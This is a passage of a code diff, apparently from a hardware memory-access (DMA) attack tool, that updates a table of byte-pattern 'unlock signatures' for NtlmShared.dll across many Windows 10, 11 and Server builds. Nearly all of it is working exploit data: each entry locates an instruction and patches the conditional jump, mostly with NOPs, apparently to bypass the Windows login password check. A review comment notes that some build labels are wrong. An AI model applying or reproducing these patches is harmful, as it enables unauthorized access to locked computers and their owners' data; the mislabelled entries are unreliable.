11 x64 [NtlmShared.dll (2022-08-04)/10.0.22000.856] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5291 / 2022-08-07] { .chunk = { - {.cbOffset = 0x00b,.cb = 5,.pb = { 0x48, 0x8b, 0xcb, 0x48, 0xff } }, - {.cbOffset = 0x01d,.cb = 6,.pb = { 0x0f, 0x84, 0xb2, 0xfa, 0xff, 0xff } }, - {.cbOffset = 0x01d,.cb = 2,.pb = { 0x0f, 0x85 } } } + { .cbOffset = 0x76C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x43, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x778,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x778,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - // Windows 11 x64 [NtlmShared.dll (2022-08-05)/10.0.22621.382] - // Windows 11 x64 [NtlmShared.dll (2022-09-27)/10.0.22621.608] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.14393.5850 / 2023-03-30] { .chunk = { - {.cbOffset = 0xFBD,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x3c, 0x23 } }, - {.cbOffset = 0xFCC,.cb = 6,.pb = { 0x0f, 0x85, 0xc4, 0xfa, 0xff, 0xff } }, - {.cbOffset = 0xFCC,.cb = 2,.pb = { 0x0f, 0x85 } } } + { .cbOffset = 0x77C,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x33, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x788,.cb = 6,.pb = { 0x0F, 0x85, 0x18, 0xFB, 0xFF, 
0xFF } }, + { .cbOffset = 0x788,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.1631 / 2019-02-06] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.15063.2106 / 2019-09-30] + { .chunk = { + { .cbOffset = 0x622,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB5, 0x1C, 0x00, 0x00 } }, + { .cbOffset = 0x62E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x62E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.15254.245 / 2018-01-30] + { .chunk = { + { .cbOffset = 0x612,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC5, 0x1C, 0x00, 0x00 } }, + { .cbOffset = 0x61E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x61E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1268 / 2019-07-05] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.1448 / 2019-10-02] + { .chunk = { + { .cbOffset = 0x622,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC5, 0x1C, 0x00, 0x00 } }, + { .cbOffset = 0x62E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x62E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.16299.192 / 2018-01-01] + { .chunk = { + { .cbOffset = 0x612,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xD5, 0x1C, 0x00, 0x00 } }, + { .cbOffset = 0x61E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x61E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.1067 / 2019-10-02] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.590 / 2019-02-06] + { .chunk = { + { .cbOffset = 0x6A2,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x45, 0x1C, 0x00, 0x00 } }, + { .cbOffset = 0x6AE,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 
0xFF } }, + { .cbOffset = 0x6AE,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.17134.523 / 2019-01-01] + { .chunk = { + { .cbOffset = 0x692,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x55, 0x1C, 0x00, 0x00 } }, + { .cbOffset = 0x69E,.cb = 6,.pb = { 0x0F, 0x85, 0x2E, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x69E,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.10935 / 2022-08-05] + { .chunk = { + { .cbOffset = 0x7CD,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x22, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x7D9,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x7D9,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.194 / 2018-12-04] + { .chunk = { + { .cbOffset = 0x73D,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xB2, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x749,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x749,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.316 / 2019-02-06] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.802 / 2019-10-02] + { .chunk = { + { .cbOffset = 0x74D,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xA2, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x759,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x759,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.17763.5122 / 2023-11-08] + { .chunk = { + { .cbOffset = 0x7DD,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x12, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x7E9,.cb = 6,.pb = { 0x0F, 0x84, 0x0B, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x7E9,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.1 / 2019-03-18] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.10022 / 2019-09-15] + 
// Signature for Windows 10 x64 [NtlmShared.dll 10.0.18362.418 / 2019-10-06] + { .chunk = { + { .cbOffset = 0x72F,.cb = 9,.pb = { 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0xC0, 0x1B, 0x00, 0x00 } }, + { .cbOffset = 0x73B,.cb = 6,.pb = { 0x0F, 0x84, 0x09, 0xFB, 0xFF, 0xFF } }, + { .cbOffset = 0x73B,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.1 / 2019-12-07] + { .chunk = { + { .cbOffset = 0x423,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0x53, 0x20, 0x00, 0x00 } }, + { .cbOffset = 0x435,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } }, + { .cbOffset = 0x435,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2728 / 2023-03-09] + { .chunk = { + { .cbOffset = 0x4B3,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xC3, 0x1F, 0x00, 0x00 } }, + { .cbOffset = 0x4C5,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } }, + { .cbOffset = 0x4C5,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.2965 / 2023-04-27] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3636 / 2023-10-20] + // Signature for Windows 10 x64 [NtlmShared.dll 10.0.19041.3684 / 2023-10-17] + { .chunk = { + { .cbOffset = 0x4C3,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xB3, 0x1F, 0x00, 0x00 } }, + { .cbOffset = 0x4D5,.cb = 6,.pb = { 0x0F, 0x84, 0xBA, 0xFA, 0xFF, 0xFF } }, + { .cbOffset = 0x4D5,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.1668 / 2023-03-30] + { .chunk = { + { .cbOffset = 0xA7B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xA3, 0x28, 0x00, 0x00 } }, + { .cbOffset = 0xA8D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } }, + { .cbOffset = 0xA8D,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 11 x64 [NtlmShared.dll 10.0.20348.887 / 2022-08-04] + { .chunk = { + { .cbOffset = 0xA6B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 
0xB3, 0x28, 0x00, 0x00 } }, + { .cbOffset = 0xA7D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } }, + { .cbOffset = 0xA7D,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.1696 / 2023-03-09] + { .chunk = { + { .cbOffset = 0x00B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xE3, 0x22, 0x00, 0x00 } }, + { .cbOffset = 0x01D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } }, + { .cbOffset = 0x01D,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.2600 / 2023-11-08] + { .chunk = { + { .cbOffset = 0x01B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0xD3, 0x22, 0x00, 0x00 } }, + { .cbOffset = 0x02D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } }, + { .cbOffset = 0x02D,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 11 x64 [NtlmShared.dll 10.0.22000.778 / 2022-06-18] + { .chunk = { + { .cbOffset = 0xF8B,.cb = 10,.pb = { 0x48, 0x8B, 0xCB, 0x48, 0xFF, 0x15, 0x63, 0x23, 0x00, 0x00 } }, + { .cbOffset = 0xF9D,.cb = 6,.pb = { 0x0F, 0x84, 0xB2, 0xFA, 0xFF, 0xFF } }, + { .cbOffset = 0xF9D,.cb = 2,.pb = { 0x0F, 0x85 } } } + }, + // Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2067 / 2023-07-11] + // Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2506 / 2023-10-19] + // Signature for Windows 11 x64 [NtlmShared.dll 10.0.22621.2567 / 2023-10-14] + { .chunk = { + { .cbOffset = 0xFC9,.cb = 11,.pb = { 0x48, 0x8D, 0x4B, 0x10, 0x48, 0xFF, 0x15, 0x2C, 0x23, 0x00, 0x00 } }, + { .cbOffset = 0xFDC,.cb = 6,.pb = { 0x0F, 0x85, 0xC4, 0xFA, 0xFF, 0xFF } }, + { .cbOffset = 0xFDC,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + }, + }; KERNEL_FUNCTIONS2 fnk2; PPHYSICAL_MEMORY_RANGE pMemMap, pMM; diff --git a/readme.md b/readme.md index cdb96bf..c75f0b3 100644 --- a/readme.md +++ b/readme.md 
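Review bot: The generated comments label both 10.0.20348.x builds as "Windows 11 x64", whereas the entry this hunk removes identified 10.0.20348.887 as "Windows Server2022 x64". The generator seems to bucket every build above 19041 as Windows 11. These comments are the only record of which product builds each pattern corresponds to, so the label should stay accurate, e.g. `// Signature for Windows Server 2022 x64 [NtlmShared.dll 10.0.20348.887 / 2022-08-04]`. The same labels are repeated in files/unlock_win11x64.sig. The enclosing `Unlock` function begins and ends outside this hunk.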
@@ -296,4 +296,5 @@ v4.1 * Linux PCIe FPGA performance improvements. Latest: -* benchmark command added. +* Benchmark command added. +* Unlock signatures updated.